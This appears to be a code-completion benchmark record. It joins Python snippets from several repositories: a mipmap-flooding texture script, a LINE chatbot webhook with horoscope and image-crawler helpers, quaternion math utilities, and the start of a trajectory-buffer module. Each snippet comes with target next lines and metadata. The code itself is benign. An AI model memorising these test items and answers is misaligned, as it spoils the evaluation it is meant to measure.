new_height = int((float(image.size[1]) * float(width_percent)))
return new_height
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
"""Constructs the full path to a log file, clears the existing log file, and sets up a logger."""
logs_directory = os.path.join(directory, "logs")
Path(logs_directory).mkdir(parents=True, exist_ok=True)
out_log_file = Path(os.path.join(logs_directory, f"{filename.split('.')[0]}.txt"))
clear_log_file(out_log_file)
return setup_logger("mipmap_flooding", out_log_file.__str__())
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter()
| # Default packages
# Third party packages
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
input_texture_color_abs_path: str) -> str | Optional[None]:
if color is None or alpha_mask is None:
message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
elif not _do_resolutions_match(color, alpha_mask, logger):
message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
elif not _is_power_of_two_image(color, logger):
message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
else:
message = None
return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
"""Check if the resolutions of color and alpha images match."""
logger.info("--- Verifying that inputs resolutions do match ...")
return True if color.size == alpha.size else False
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
"""Check if all dimensions of the input image are powers of two."""
logger.info("--- Verifying that inputs are power of two images ...")
for res in color.size:
if (res & (res - 1)) != 0:
return False
return True
def _get_mip_levels(image: Image, logger: logging.Logger) -> int:
"""Calculate the number of mip levels based on image size."""
logger.info("--- Calculating mip map levels...")
image_short_side = image.size[0] if image.size[0] < image.size[1] else image.size[1]
logger.info(f"--- Done. Miplevels: {round(math.log2(image_short_side))}")
return round(math.log2(image_short_side))
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: Image) -> int:
"""Calculate the height of the image based on the specified width."""
width_percent = (image_width / float(image.size[0]))
new_height = int((float(image.size[1]) * float(width_percent)))
return new_height
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
"""Constructs the full path to a log file, clears the existing log file, and sets up a logger."""
logs_directory = os.path.join(directory, "logs")
Path(logs_directory).mkdir(parents=True, exist_ok=True)
out_log_file = Path(os.path.join(logs_directory, f"{filename.split('.')[0]}.txt"))
clear_log_file(out_log_file)
return setup_logger("mipmap_flooding", out_log_file.__str__())
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter() | out_directory = get_output_directory(out_abs_path) | 3 | 2023-10-25 11:05:59+00:00 | 4k |
Lin-jun-xiang/chatgpt-line-bot | chatgpt_linebot/urls.py | [
{
"identifier": "Memory",
"path": "chatgpt_linebot/memory.py",
"snippet": "class Memory(MemoryInterface):\n \"\"\"Chat Memory\n \n Args:\n storage (List[Dict[str, str]]): Chat history, ex: \n [\n {'role': 'system', 'content': 'You are a helpful assistant.'},\n {'role': 'user', content': 'Hi'},\n {'role': 'system', 'content': 'Hi. How can i assist u?'},\n ...\n ]\n\n id (int): user_id, grouop_id, room_id\n \"\"\"\n def __init__(self, memory_message_count: int) -> None:\n self.storage = defaultdict(list)\n self.memory_message_count = memory_message_count\n\n def _initialize(self, id: str) -> None:\n self.storage[id] = [{\n 'role': 'system', 'content': 'You are a helpful assistant.'\n }]\n\n def _drop_message(self, id: str) -> str:\n if len(self.storage.get(id)) >= (self.memory_message_count + 1) * 2 + 1:\n return [self.storage[id][0]] + self.storage[id][-(self.memory_message_count * 2):]\n return self.storage.get(id)\n\n def append(self, id: str, role: str, content: str) -> None:\n if self.storage[id] == []:\n self._initialize(id)\n self.storage[id].append({\n 'role': role,\n 'content': content\n })\n self._drop_message(id)\n\n def get(self, id: str) -> str:\n return self.storage[id]\n\n def remove(self, id: str) -> None:\n self.storage[id] = []"
},
{
"identifier": "chat_completion",
"path": "chatgpt_linebot/modules/chat.py",
"snippet": "def chat_completion(id: int, memory: Memory) -> str:\n \"\"\"Use OpenAI API via gpt4free providers\"\"\"\n response = chat(memory.get(id))\n memory.append(id, 'system', response)\n\n return response"
},
{
"identifier": "Horoscope",
"path": "chatgpt_linebot/modules/horoscope.py",
"snippet": "class Horoscope:\n HOST = \"https://www.cosmopolitan.com/tw/horoscopes/\"\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'\n }\n error_msg = (\n \"Cannot get the horoscope, please try again.🥶\\n\"\n \"Or connect to developer: https://github.com/Lin-jun-xiang/chatgpt-line-bot/issues\"\n )\n\n\n def __init__(self) -> None:\n self.horoscope_urls = self.get_horoscope_urls()\n\n def get_horoscope_urls(self) -> list:\n \"\"\"Get all horoscope urls\n Returns\n -------\n horoscope_urls (List[Dict]):\n [\n {'name': '天蠍座', 'url': 'https://www...'},\n {'name': '獅子座', 'url': 'https://www...'},\n ...\n ]\n \"\"\"\n try:\n response = requests.get(f\"{self.HOST}weekly/\", headers=self.headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n # Find the script tag containing JSON data\n script_tag = soup.find('script', {'id': 'json-ld'})\n\n horoscope_urls = []\n\n if not script_tag:\n return\n # Extract the text content of the script tag\n script_content = script_tag.contents[0]\n\n # Load the JSON data\n json_data = json.loads(script_content)\n\n # Extract the information for each zodiac sign\n for item in json_data['itemListElement']:\n name = item['name']\n url = item['url']\n horoscope_urls.append({\"name\": name, \"url\": url})\n\n return horoscope_urls\n\n except Exception as e:\n print(e)\n\n def _process_horoscope_response(self, content: str) -> str:\n if not content:\n return f\"{self.error_msg}\\nContent is None.\"\n response = chat_completion(\n [{\"role\": \"user\", \"content\": horoscope_template+content}]\n )\n return response\n\n def get_horoscope_response(self, target: str) -> str:\n if not self.horoscope_urls:\n return f\"{self.error_msg}\\nNot found any horoscope urls.\"\n \n match_target = re.search(r'(\\w{2}座)', target)\n\n if not match_target:\n return self.error_msg\n \n for horoscope_url in self.horoscope_urls:\n if horoscope_url.get('name') == match_target.group():\n res = requests.get(horoscope_url.get('url'), headers=self.headers)\n soup = BeautifulSoup(res.content, 'html.parser')\n meta_excerpt = soup.find('meta', {'name': 'sailthru.excerpt'})\n\n if not meta_excerpt:\n return f\"{self.error_msg}\\nParse horoscope url failed.\"\n\n content = meta_excerpt.get('content')\n return self._process_horoscope_response(content)\n\n return self.error_msg"
},
{
"identifier": "recommend_videos",
"path": "chatgpt_linebot/modules/youtube_recommend.py",
"snippet": "def recommend_videos():\n \"\"\"Recommend youtube videos randomly\"\"\"\n push_video = random.sample(favorite_videos, 3)\n\n prompt = f\"{youtube_recommend_template}{push_video}\"\n response = chat_completion([{\"role\": \"user\", \"content\": prompt}])\n\n return response"
},
{
"identifier": "ImageCrawler",
"path": "chatgpt_linebot/modules/image_crawler.py",
"snippet": "class ImageCrawler:\n \"\"\"Crawl the Image\"\"\"\n def __init__(self, engine: str = 'icrawler', nums: int = 1) -> None:\n self.image_save_path = (\"./\")\n self.engine = engine\n self.nums = nums\n\n def _is_img_url(self, url) -> bool:\n \"\"\"Check the image url is valid or invalid\"\"\"\n try:\n response = requests.head(url)\n content_type = response.headers['content-type']\n return content_type.startswith('image/')\n except requests.RequestException:\n return False\n except Exception as e:\n return False\n\n def _icrawler(self, search_query: str, prefix_name: str = 'tmp') -> list:\n \"\"\"Icrawler for google search images (Free)\"\"\"\n google_crawler = GoogleImageCrawler(\n downloader_cls=CustomLinkPrinter,\n storage={'root_dir': self.image_save_path},\n parser_threads=4,\n downloader_threads=4\n )\n\n # TODO: https://github.com/hellock/icrawler/issues/40\n google_crawler.session.verify = False\n google_crawler.downloader.file_urls = []\n\n google_crawler.crawl(\n keyword=search_query,\n max_num=self.nums,\n file_idx_offset=0\n )\n img_urls = google_crawler.downloader.file_urls\n print(f'Get image urls: {img_urls}')\n\n return img_urls[:self.nums]\n\n def get_url(self, search_query: str) -> str:\n try:\n if self.engine == 'icrawler':\n urls = self._icrawler(search_query)\n for url in urls:\n if self._is_img_url(url):\n return url\n\n except Exception as e:\n print(f'\\033[31m{e}')"
},
{
"identifier": "girlfriend",
"path": "chatgpt_linebot/prompts/template.py",
"snippet": ""
}
] | import sys
import config
from fastapi import APIRouter, HTTPException, Request
from linebot import LineBotApi, WebhookHandler
from linebot.exceptions import InvalidSignatureError
from linebot.models import *
from chatgpt_linebot.memory import Memory
from chatgpt_linebot.modules import (
Horoscope,
ImageCrawler,
chat_completion,
recommend_videos,
)
from chatgpt_linebot.prompts import girlfriend | 2,643 |
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
"""
|
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
""" | videos = recommend_videos() | 3 | 2023-10-24 09:01:13+00:00 | 4k |
nv-tlabs/pacer | uhc/utils/math_utils_new.py | [
{
"identifier": "quaternion_matrix",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_matrix(quaternion):\n \"\"\"Return homogeneous rotation matrix from quaternion.\n\n >>> M = quaternion_matrix([0.99810947, 0.06146124, 0, 0])\n >>> numpy.allclose(M, rotation_matrix(0.123, [1, 0, 0]))\n True\n >>> M = quaternion_matrix([1, 0, 0, 0])\n >>> numpy.allclose(M, numpy.identity(4))\n True\n >>> M = quaternion_matrix([0, 1, 0, 0])\n >>> numpy.allclose(M, numpy.diag([1, -1, -1, 1]))\n True\n\n \"\"\"\n q = numpy.array(quaternion, dtype=numpy.float64, copy=True)\n n = numpy.dot(q, q)\n if n < _EPS:\n return numpy.identity(4)\n q *= math.sqrt(2.0 / n)\n q = numpy.outer(q, q)\n return numpy.array([\n [1.0-q[2, 2]-q[3, 3], q[1, 2]-q[3, 0], q[1, 3]+q[2, 0], 0.0],\n [ q[1, 2]+q[3, 0], 1.0-q[1, 1]-q[3, 3], q[2, 3]-q[1, 0], 0.0],\n [ q[1, 3]-q[2, 0], q[2, 3]+q[1, 0], 1.0-q[1, 1]-q[2, 2], 0.0],\n [ 0.0, 0.0, 0.0, 1.0]], dtype=numpy.float64)"
},
{
"identifier": "quaternion_about_axis",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_about_axis(angle, axis):\n \"\"\"Return quaternion for rotation about axis.\n\n >>> q = quaternion_about_axis(0.123, [1, 0, 0])\n >>> numpy.allclose(q, [0.99810947, 0.06146124, 0, 0])\n True\n\n \"\"\"\n q = numpy.array([0.0, axis[0], axis[1], axis[2]], dtype=np.float64)\n qlen = np.linalg.norm(q)\n q = q * math.sin(angle/2.0)\n q[0] = math.cos(angle/2.0)\n return q"
},
{
"identifier": "quaternion_inverse",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_inverse(quaternion):\n \"\"\"Return inverse of quaternion.\n\n >>> q0 = random_quaternion()\n >>> q1 = quaternion_inverse(q0)\n >>> numpy.allclose(quaternion_multiply(q0, q1), [1, 0, 0, 0])\n True\n\n \"\"\"\n q = numpy.array(quaternion, dtype=numpy.float64, copy=True)\n q[1:] *= -1.0\n return q / numpy.dot(q, q)"
},
{
"identifier": "quaternion_multiply",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_multiply(quaternion1, quaternion0):\n \"\"\"Return multiplication of two quaternions.\n\n >>> q = quaternion_multiply([4, 1, -2, 3], [8, -5, 6, 7])\n >>> numpy.allclose(q, [28, -44, -14, 48])\n True\n\n \"\"\"\n w0, x0, y0, z0 = quaternion0\n w1, x1, y1, z1 = quaternion1\n return numpy.array([\n -x1*x0 - y1*y0 - z1*z0 + w1*w0,\n x1*w0 + y1*z0 - z1*y0 + w1*x0,\n -x1*z0 + y1*w0 + z1*x0 + w1*y0,\n x1*y0 - y1*x0 + z1*w0 + w1*z0], dtype=numpy.float64)"
},
{
"identifier": "rotation_from_quaternion",
"path": "uhc/utils/transformation.py",
"snippet": "def rotation_from_quaternion(quaternion, separate=False):\n # if 1.0 - quaternion[0] < 1e-8:\n if np.abs(1.0 - quaternion[0]) < 1e-6 or np.abs(1 + quaternion[0]) < 1e-6:\n axis = np.array([1.0, 0.0, 0.0], dtype=np.float64)\n angle = 0.0\n else:\n angle = 2 * math.acos(quaternion[0])\n axis = quaternion[1:4] / math.sin(angle/2.0)\n axis /= np.linalg.norm(axis)\n\n return (axis, angle) if separate else axis * angle"
},
{
"identifier": "rotation_from_matrix",
"path": "uhc/utils/transformation.py",
"snippet": "def rotation_from_matrix(matrix):\n \"\"\"Return rotation angle and axis from rotation matrix.\n\n >>> angle = (random.random() - 0.5) * (2*math.pi)\n >>> direc = numpy.random.random(3) - 0.5\n >>> point = numpy.random.random(3) - 0.5\n >>> R0 = rotation_matrix(angle, direc, point)\n >>> angle, direc, point = rotation_from_matrix(R0)\n >>> R1 = rotation_matrix(angle, direc, point)\n >>> is_same_transform(R0, R1)\n True\n\n \"\"\"\n R = numpy.array(matrix, dtype=numpy.float64, copy=False)\n R33 = R[:3, :3]\n # direction: unit eigenvector of R33 corresponding to eigenvalue of 1\n w, W = numpy.linalg.eig(R33.T)\n i = numpy.where(abs(numpy.real(w) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n direction = numpy.real(W[:, i[-1]]).squeeze()\n # point: unit eigenvector of R33 corresponding to eigenvalue of 1\n w, Q = numpy.linalg.eig(R)\n i = numpy.where(abs(numpy.real(w) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n point = numpy.real(Q[:, i[-1]]).squeeze()\n point /= point[3]\n # rotation angle depending on direction\n cosa = (numpy.trace(R33) - 1.0) / 2.0\n if abs(direction[2]) > 1e-8:\n sina = (R[1, 0] + (cosa-1.0)*direction[0]*direction[1]) / direction[2]\n elif abs(direction[1]) > 1e-8:\n sina = (R[0, 2] + (cosa-1.0)*direction[0]*direction[2]) / direction[1]\n else:\n sina = (R[2, 1] + (cosa-1.0)*direction[1]*direction[2]) / direction[0]\n angle = math.atan2(sina, cosa)\n return angle, direction, point"
}
] | import torch
import math
import numpy as np
from uhc.utils.transformation import (
quaternion_matrix,
quaternion_about_axis,
quaternion_inverse,
quaternion_multiply,
rotation_from_quaternion,
rotation_from_matrix,
) | 2,298 |
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root":
|
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root": | rot = quaternion_matrix(q)[:3, :3] | 0 | 2023-10-31 20:47:12+00:00 | 4k |
Improbable-AI/dexenv | dexenv/runner/base_runner.py | [
{
"identifier": "stack_data",
"path": "dexenv/utils/common.py",
"snippet": "def stack_data(data, torch_to_numpy=False, dim=0):\n if isinstance(data[0], dict):\n out = dict()\n for key in data[0].keys():\n out[key] = stack_data([x[key] for x in data], dim=dim)\n return out\n if check_torch_tensor(data):\n try:\n ret = torch.stack(data, dim=dim)\n if torch_to_numpy:\n ret = ret.cpu().numpy()\n except:\n # if data is a list of arrays that do not have same shapes (such as point cloud)\n ret = data\n else:\n try:\n ret = np.stack(data, axis=dim)\n except:\n ret = data\n return ret"
},
{
"identifier": "TorchTrajectory",
"path": "dexenv/utils/data.py",
"snippet": "class TorchTrajectory:\n extra_data: Dict = field(default_factory=dict)\n data: Dict = field(default_factory=dict)\n # if capacity is given, then it will preallocate an array for items in StepData\n capacity: int = 500\n cur_id: int = 0\n list_data: List[InfoData] = field(default_factory=list)\n traj_keys_in_cpu: List = field(default_factory=list)\n\n def allocate_memory(self, step_data=None, **kwargs):\n sdata_dict = asdict(step_data) if step_data is not None else kwargs\n keys = sdata_dict.keys()\n filtered_keys = [\n x for x in keys if 'info' not in x and sdata_dict[x] is not None]\n for key in filtered_keys:\n val = sdata_dict[key]\n if isinstance(val, dict):\n for vk, vv in val.items():\n self._allocate_memory_with_key(self.convert_dict_key(key, vk), vv)\n else:\n self._allocate_memory_with_key(key, val)\n\n def convert_dict_key(self, parent_key, child_key):\n prefix = 'next_' if 'next_' in parent_key else ''\n new_key = f'{prefix + child_key}'\n return new_key\n\n def _allocate_memory_with_key(self, key, val):\n if isinstance(val, np.ndarray):\n val = torch.from_numpy(val)\n val_shape = val.shape\n if self.traj_keys_in_cpu is not None and key in self.traj_keys_in_cpu:\n device = 'cpu'\n else:\n device = val.device\n # logger.info(f'Traj key:{key} device:{device}')\n self.data[key] = torch.zeros((self.capacity,) + val_shape,\n device=device,\n dtype=val.dtype)\n\n def __getitem__(self, item):\n step_data = {k: self.data[k][item] for k in self.data.keys()}\n if len(self.list_data) > 0:\n info_data = self.list_data[item]\n step_data['info'] = info_data.info\n step_data['action_info'] = info_data.action_info\n return StepData(**step_data)\n\n def add(self, step_data=None, **kwargs):\n if len(self.data) < 1:\n self.allocate_memory(step_data, **kwargs)\n if self.cur_id == 0:\n self.list_data.clear()\n if step_data is not None:\n if not isinstance(step_data, StepData):\n raise TypeError('step_data should be an '\n 'instance of StepData!')\n sd = asdict(step_data)\n\n for key in self.data.keys():\n self._assign_value(key, sd[key], self.cur_id)\n self.list_data.append(step_data.get_info_data())\n else:\n for key in self.data.keys():\n if key in kwargs:\n val = kwargs.pop(key)\n if isinstance(val, dict):\n for kk, vv in val.items():\n kk = self.convert_dict_key(key, kk)\n self._assign_value(kk, vv, self.cur_id)\n else:\n self._assign_value(key, val, self.cur_id)\n if len(kwargs) > 0:\n info = InfoData(**kwargs)\n self.list_data.append(info)\n self.cur_id = int((self.cur_id + 1) % self.capacity)\n\n def _assign_value(self, key, val, cur_id):\n if isinstance(val, np.ndarray):\n val = torch.from_numpy(val)\n self.data[key][cur_id] = val.to(self.data[key].device, non_blocking=True)\n\n def reset(self):\n for key in self.data.keys():\n self.data[key].zero_()\n self.cur_id = 0\n self.list_data.clear()\n\n def add_extra(self, key, value):\n self.extra_data[key] = value\n\n @property\n def obs(self):\n obs = self.data.get('ob', None)\n return obs[:self.capacity]\n\n @property\n def states(self):\n states = self.data.get('state', None)\n return states[:self.capacity]\n\n @property\n def actions(self):\n actions = self.data.get('action', None)\n return actions[:self.capacity]\n\n @property\n def action_infos(self):\n return [data.action_info for idx, data in enumerate(self.list_data) if idx < self.capacity]\n\n @property\n def next_obs(self):\n next_obs = self.data.get('next_ob', None)\n return next_obs[:self.capacity]\n\n @property\n def next_states(self):\n next_states = self.data.get('next_state', None)\n return 